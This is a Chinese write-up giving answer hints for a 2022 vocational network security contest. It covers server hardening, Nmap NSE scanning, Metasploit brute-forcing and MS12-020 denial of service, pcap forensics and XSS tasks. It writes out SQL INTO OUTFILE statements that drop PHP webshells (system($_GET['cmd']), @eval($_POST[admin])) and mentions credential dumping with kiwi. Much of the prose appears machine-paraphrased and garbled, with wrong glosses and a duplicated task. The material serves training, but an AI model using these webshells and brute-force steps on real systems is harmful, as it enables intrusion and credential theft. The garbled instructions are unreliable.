2022年中职组网络安全国赛AB模块解析第3套
有word文档,要的私信我
仅仅提供思路!!!
竞赛内容
模块A 基础设施设置与安全加固
(本模块20分)
一、项目和任务描述:
假设您是某企业IT网络安全工程师,在完成企业服务器系统安全防护配置任务时,请依据任务需求确保各项服务正常运行状态。建议整合采用用户安全管理与密码策略、Nginx安全策略、日志监控策略等多维度安全防护措施,并通过中间件服务安全策略、本地安全策略以及防火墙策略等多种防护手段来提升整体系统的网络安全防护能力。本模块要求以提供的A模块答题模板为基础,在完成具体任务操作后进行截图记录,并在相关位置进行详细说明;最终结果需提交为Word文档形式,并于提交时转换为PDF格式保存,请将文件命名为"赛位号+模块A"并附上完整文件夹至指定位置
二、服务器环境说明
Windows 用户名:administrator,密码:123456
Linux 用户名:root,密码:123456
三、具体任务(每个任务得分以电子答题卡为准)
A-1****任务一 登录安全加固(Windows, Linux)
请对服务器Windows、Linux按要求进行相应的设置,提高服务器的安全性。
1.密码策略(Windows, Linux)
a.最小密码长度不少于13个字符;


b.密码必须符合复杂性要求。


2.用户安全管理(Windows)
a. 配置文件和其他对象的所有权仅限于administrators组拥有;

b.禁止普通用户使用命令提示符;

c.设置不显示上次登录的用户名。
A-2任务二 Nginx安全策略(Linux)

Nginx****服务在 nginx.conf进行修改配置
3.禁止目录浏览和隐藏服务器版本和信息显示;

4.限制HTTP请求方式,只允许GET、HEAD、POST;
if ($request_method !~* GET|POST|HEAD) {
return 403;
}
5.设置客户端请求主体读取超时时间为10;

client_body_timeout 10 body(身体)
6.设置客户端请求头读取超时时间为10;

client_header_timeout 10
7.将Nginx服务降权,使用www用户启动服务。
A-3****任务三 日志监控(Windows)
安全日志的最小文件大小设为128MB;一旦日志文件大小超过最大限制,则会自动替换超过30天之前的记录。

- 应用日志文件必须至少为64MB,在达到最大容量限制时,默认情况下会重写早于15天的日志记录。

系统日志的最小存储量设定为32MB,在最大存储容量达到上限时会自动进行相应的配置以处理事件请求。

A-4****任务四 中间件服务加固SSHD\VSFTPD\IIS(Windows, Linux)
11.SSH服务加固(Linux)
a.修改ssh服务端口为2222;

b.ssh禁止root用户远程登录;

c. 配置root用户的计划任务安排。每天早晨七点五十分定时启动SSH服务,在每日晚上十点五十分停止运行;每周六早晨七点三十分执行SSH服务的重启操作。

d.修改SSHD的PID档案存放地。

12.VSFTPD服务加固(Linux)
a.设置运行vsftpd的非特权系统用户为pyftp;

b.限制客户端连接的端口范围在50000-60000;

c.限制本地用户登陆活动范围限制在home目录。

13.IIS加固(Windows)
配置IIS的日志审计功能,并规定采用W3C标准存储日志文件,仅收集日期、时间戳(即客户端IP地址)、用户名以及操作方法。

b.关闭IIS的WebDAV功能增强网站的安全性。

A-5****任务五 本地安全策略(Windows)
14.禁止匿名枚举SAM帐户;

15.禁止系统在未登录的情况下关闭;

16.禁止存储网络身份验证的密码和凭据;

17.禁止将Everyone权限应用于匿名用户;

18.在超过登录时间后强制注销。

A-6****任务六 防火墙策略(Linux)
19.设置防火墙允许本机转发除ICMP协议以外的所有数据包;
为了避免Nmap等扫描工具对关键资源(如重要数据或设备)进行探测和访问,建议配置iptables防火墙策略以管理80号端口的流量
为抵御拒绝服务攻击,在服务器上配置iptables防火墙策略以拦截传入流量,并限定每分钟仅接收3个数据包(若超出此限制的网络数据包将被丢弃而非处理)
22.只允许转发来自172.16.0.0/24局域网段的DNS解析请求数据包。
模块B 网络安全事件响应、数字取证调查和应用安全
(本模块40分,每个子任务4分)
B-1任务一:主机发现与信息收集
*任务说明:仅能获取Server1的IP地址
通过Kali系统运行Nmap工具进行本地网络接口扫描,并将此操作的所有相关命令记录下来作为安全监控的Flag值。
nmap --iflist
利用Kali对目标机环境实施VNC服务漏洞扫描渗透测试,并将其作为标记值使用(例如:MySQL-brute.nse)至安全平台或报告系统。
进/usr/share/nmap/scripts
ls |grep vnc
vnc-brute.nse
利用Kali工具执行靶机场景下的VNC服务渗透测试,并将该操作显示的结果中的VNC版本号作为标记值提交;
进/usr/share/nmap/scripts
ls |grep vnc
vnc-info.nse?
在Kali系统中运行Nmap工具向类DNS服务avahi投射空的UDP数据包以发起拒绝服务请求,并将所使用的脚本文件名作为标志位值以(例如MySQL-brute.nse的形式)提交。
进/usr/share/nmap/scripts
ls |grep avahi
broadcast-avahi-dos.nse?
利用Kali工具在靶机环境中执行模糊扫描,并向靶机服务器发送异常流量以触发其服务响应机制。从而识别出藏在服务器内部的潜在漏洞,并记录该操作所使用的脚本文件名(例如:MySQL-brute.nse)作为安全标志进行提交。
模糊测试
ls |grep fuzz
dns-fuzz.nse?
在Kali环境中部署 Zenmap 工具进行服务器场景扫描时可能会暴露远程任意代码执行漏洞,并将其脚本名称字符串用作Flag值(例如 MySQL-brute.nse)提交;
ls |grep shell
http-shellshock.nse
- 配置 Zenmap 工具于 Kali 环境下扫描服务器场景可能存在远程任意代码执行漏洞(示例:检测路径为 /cgi-bin/bin,请附加 --script-args 选项并设置 uri 为 /cgi-bin/bin)。将该操作的结果中的漏洞编号与发布日期组合成 Flag 字段,并提交此信息。
http-shellshock.nse
cat去查看这个漏洞
CVE-2014-7169,2014.09.24
B-2任务二:渗透测试
*任务说明:仅能获取Server2的IP地址
在MSF工具中使用search命令来检索MS12020 RDP拒绝服务攻击模块,并将响应结果中的漏洞披露时间设置为标志位(例如:2012-10-16)提交。
Ms12020时间
通过MSF工具执行MS12020 RDP拒绝服务漏洞的辅助扫描功能,并将此操作所生成的指令序列设置为标志位提交至系统监控中心以供后续分析处理
use
通过调用set命令配置目标IP地址的同时,在线扫描靶机漏洞状况。随后启动该功能模块后执行相应的检测流程。获取响应数据中的倒数第二行末尾的词汇并将其定义为Flag参数。
运行后查看即可
通过MSF工具触发执行RDP拒绝服务漏洞攻击功能模块;从该模块运行后的显示结果中提取倒数第一行最后一个字符内容,并将其用于提交作为标记标识。
加固后再运行查看结果
在目标计算机上关闭远程桌面服务后,请重新执行MS12020程序。
该防护机制将用于检测和修复远程桌面协议拒绝服务漏洞。
通过执行该防护机制并查看返回信息中的倒数第二行最后一个词来确定响应标志。
提交上一题的倒数第二行最后一个单词
B-3任务三:MYSQL安全测试
*任务说明:仅能获取Server3的IP地址
通过在Kali Linux渗透测试场景中使用相关工具,识别并获取MySQL服务的端口号,并将其作为旗帜值进行提交。
3306?
管理者曾在Web界面登录数据库并运行特定SQL语句:select '<?php echo '
';system($_GET['cmd']); echo '';' INTO OUTFILE 'C:/phpstudy/test1.php';随后通过该执行语句调用dos命令以查看服务器详细配置信息,并将服务器系统型号作为参数记录下来;
一句话木马?
在kali渗透环境中利用高级威胁分析框架(MSF)工具进行操作,在root目录下的预设密码字典文件中搜索并解密MySQL数据库的安全凭证,并将其作为验证标志使用,在root账户下提交该验证标志完成任务
Mysql_login
在渗透测试场景中,通过 Kali Linux 的 msf 工具对 root 目录下的 password.txt 字典文件进行操作,对 MySQL 数据库的账户进行密码还原操作,并将其作为 Flag 值提交到安全平台
使用mysql_login模块爆破密码,然后爆破出来的密码提交
通过用户名和密码登录指定的数据库后,在Web应用中执行以下SELECT语句:SELECT '<?php @eval($_POST[admin]);?>'************ 'C:/phpstudy/shell.php' ,该请求用于向服务器发送执行PHP脚本的功能。其中将星号后的明文作为Flag字段值(注:Star为大写字母或空字符)传递给服务器。
INTO OUTFILE?
采用工具将文件直接传递至已知的shell.php进程,并从服务器的根目录获取相应的压缩包文件;随后将该压缩包中包含的关键字信息提交至相关平台进行处理。
用菜刀连接把文件下载下来,或者解压压缩包
B-4任务四:Web安全应用
*任务说明:仅能获取Server4的IP地址
1. 通过渗透机扫描靶机Linux,将HTTP服务的端口号作为Flag值提交;
80/8080/8081??
利用渗透工具侵入目标服务器的HTTP服务,并将Web漏洞注入请求中的URL地址,并将其作为Flag值提交;
dirb http://ip
3. 利用渗透工具连接至目标计算机的Windows操作系统。捕获标名为pcapng的流量数据包文件。该流量数据包反映了黑客针对目标计算机运行Linux系统的渗透行为,并将其命名为Flag变量供后续处理使用;
通过网站下载数据包,提交数据包名称
利用攻击工具对 pcapng 数据包文件进行解析,并在报告中提取该次入侵操作中管理员用户的密码作为标志字段。
分析包内容
利用专门的工具对 pcapng 数据包文件进行解析,并从中提取其中的有效代码,并将其作为 Flag 值提交给系统监控中心。
利用网络渗透测试工具对 pcapng 数据包文件进行解析,并提取其中包含的黑客连接至数据库的密码作为标志位发送出去。
过滤规则?mysql?
B-5任务五:网站XSS漏洞
*任务说明:仅能获取Server5的IP地址
提交关键字?
通过test用户的账号(密码为123456)对靶机网站进行登录,在输入字段验证网页是否存在跨站脚本攻击风险。利用JavaScript代码向网页显示'HelloWorld'提示信息,并将用于生成该提示窗口的JavaScript函数名称作为FLAG字段发送至后端处理。
JavaScript语言?
对所分析的网页内容进行识别并提取出其中的所有JavaScript函数名称,并将其作为FLAG值提交给系统
请通过网络获取目标机FTP目录下的中文本文档,并将其内容导入到网站提供的输入字段中进行处理;随后,请分别获取目标机FTP目录下的Python脚本.py文稿以及对应的可执行程序.pyc文件,并依次在其上进行执行操作;最后,请从该Python脚本.py文稿的第一行中提取出第二个关键词作为FLAG值,并将其发送至指定的位置供后续使用。
从靶机FTP服务器下载PHP文件,并通过该页面将PHP文件上传至指定路径后端处理,并读取C:\flag.txt中的内容作为FLAG值提交。
B-6任务六:数据分析数字取证
*任务说明:仅能获取Server6的IP地址
对Server6桌面环境下的Alpha-1.pcapng流量数据内容进行分析,在对Alpha-1.pcapng的分析过程中识别出恶意用户首次登录时所使用的第几个数据包,并将其标记为Flags字段中的数值
请进一步查看数据包文件Alpha-1.pcapng,并识别恶意用户扫描的所有目标端口。随后,请将上述收集到的全部端口号按升序排列,并以格式化的列表形式(如:端口1, 端口2,…, 端口n)作为Flag值提交。
请进一步查看数据包文件Alpha-1.pcapng,并识别恶意用户扫描的所有目标端口。随后,请将上述收集到的全部端口号按升序排列,并以格式化的列表形式(如:端口1, 端口2,…, 端口n)作为Flag值提交。
请继续对数据包文件Alpha-1.pcapng进行详细分析以确定异常登录账户标识,并将其记录为异常登录账户标识;
进一步查看数据包文件Alpha-1.pcapng以探测出恶意用户在第几个数据包到第几个数据包之间利用了MIME漏洞,并将该时间段的数据包编号作为Flag值(格式:1,30)返回给上层协议处理
下一步操作应包括对数据包文件Alpha-1.pcapng进行分析以识别恶意用户连接到一句话木马,并获取其密码信息作为关键安全参数(Flag)进行提交。
进一步查看数据包文件Alpha-1.pcapng以识别恶意用户在何处通过一句话木马进行二次 writes,并将该路径、文件名及扩展名作为Flag值提交
进一步核查数据流量包Alpha-1.pcapng的详细信息,并识别出恶意用户可能下载的相关信息作为参考依据反馈给相关部门。
B-7任务七:Telnet弱口令渗透测试
*任务说明:仅能获取Server7的IP地址
在Kali 2.0渗透机上运用Zenmap工具对Windows服务器场景内的网络段进行扫描,在该操作中所使用的命令必须添加必要的字符串作为标志位值(不考虑IP地址),然后提交
Zenmap -p 21,22,23 网段
对服务器场景Windows执行系统服务和版本更新的渗透测试,并将该操作显示结果中TELNET服务对应的服务端口信息作为关键指标提交给安全团队
telnet对应的服务信息?
-sV
利用Kali2.0中的MSF功能模块对目标进行渗透攻击,在执行搜索指令后,请获取被扫描弱口令模块的具体名称,并将其作为Flag值提交。
telnet_login?
在上一题的基础上运行该模块,并显示其配置信息(通过show options命令),将显示的结果中包含的目标地址、密码猜解字典、线程以及账户配置参数的相关字段设置为Flag值(各字段之间以英文逗号分隔)后进行提交
RHOSTS,PASS_FILE,THREADS,USERNAME
在MSF模块中进行目标靶机IP地址的设置,请按照以下步骤操作:首先,在此界面中找到并输入目标靶机的IP地址信息。随后,在配置命令参数中提取前两个关键词作为Flag字段的赋值内容,并确保其正确无误地传递给系统执行相应的任务流程。
set RHOSTS
在MSF模块中配置密码字典配置参数名为dict_name用于枚举攻击其路径设为/root/2.txt用户名设置为user执行枚举操作后捕获返回信息并将捕获结果作为Flag值进行提交
密码爆破提交
基于上一题的成果,在此基础上通过第6题获取的密码进行telnet连接至目标机器,并将桌面上名为Flag值的.bmp文件中的英文单词作为新的Flag值提交。
cat 文件或者网站?
B-8任务八:Linux系统安全
*任务说明:仅能获取Server8的IP地址
利用本地PC上的Kali渗透测试平台,在服务器场景Server8上执行系统服务及版本信息的渗透扫描测试,并将该操作显示的结果中对应22端口的服务版本信息字符串作为Flag值提交。
22端口版本信息
2.找到/var/www目录中的图片文件,将文件名称作为Flag值提交;
网站路径?
3.找到Flag1作为Flag值提交;
4.找到Flag2作为Flag值提交;
5.找到Flag3作为Flag值提交。
B-9任务九:Windows操作系统渗透测试
*任务说明:仅能获取Server9的IP地址
利用本地PC配置的Kali渗透测试平台对Server9进行了系统服务和版本扫描测试,并以该操作在1433端口中解析出的服务版本信息作为识别标志(如实例中的3.1.4500)反馈给后台系统。
Nmap -sV -p 1433 ip
扫描的版本提交
利用基于Kali的操作系统,在本地PC上执行系统服务和版本扫描的渗透测试任务,并将DNS服务器主机的完全合格域名指定为Flag值并提交。
ipconfig /all
在目标服务器上对SQL-Server数据库中的无权限账号(即无法直接运行系统命令)的密码进行设置,并将其作为Flag值提交。
通过smbclient下载excel文件,excel有隐藏的宏,然后查看代码
在目标服务器上为拥有较高权限的用户(这些用户可通过运行数据库指令来执行系统命令)的密码设置为Flag值进行提交。
进meterpreter爆
load kiwi
定位系统路径中的指定目录,并获取带有.docx扩展名的文档内容进行导出操作。
进靶机
B-10任务十:应急响应
*任务说明:仅能获取Server10的IP地址
- 网络攻击者通过网络手段侵入本地计算机,在Web服务器主页部署了一个恶意木马进程,请找出该恶意进程并将其从系统中删除,并将相应的标题名称作为Flag值提交;
2.攻击者侵入本机数据库服务器后又加入了赋予管理权限的高级账户,并将其密码作为关键参数发送出去。
请处理以下网络管理指令:首先,请某人试图侵入本机计算机网络并创建一个包含多个超级管理员账户的本地服务器环境;随后,请删除除administrator账户外的所有其他超级管理员账户;最后,在命令提示符下运行net user命令,并以' Administrator '作为参数传递给该命令以便完成操作。
请清理不必要的启动项程序,并将这些程序名称作为Flag值(多个名称可用逗号分隔表示)提交至指定位置;
攻击者在服务器上植入了一个恶意软件程序,请找出并删除该恶意软件,并将该恶意软件文件名作为Flag值提交给系统管理员。
